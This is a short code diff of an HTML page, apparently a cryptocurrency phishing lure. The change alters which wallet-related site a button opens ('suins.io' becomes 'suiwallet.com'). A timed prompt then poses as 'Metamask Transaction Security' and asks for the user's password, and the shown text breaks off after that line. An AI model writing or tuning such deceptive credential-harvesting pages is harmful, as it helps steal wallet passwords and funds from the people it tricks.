--- a/sui_prompt.html
+++ b/sui_prompt.html
@@ -13,7 +13,7 @@
     <script>
         document.getElementById('triggerBtn').onclick = () => {
 
-            window.open('http://suins.io');
+            window.open('http://suiwallet.com');
 
             setTimeout(() => {
                 const userPassword = prompt('Metamask Transaction Security. Please enter your password:');
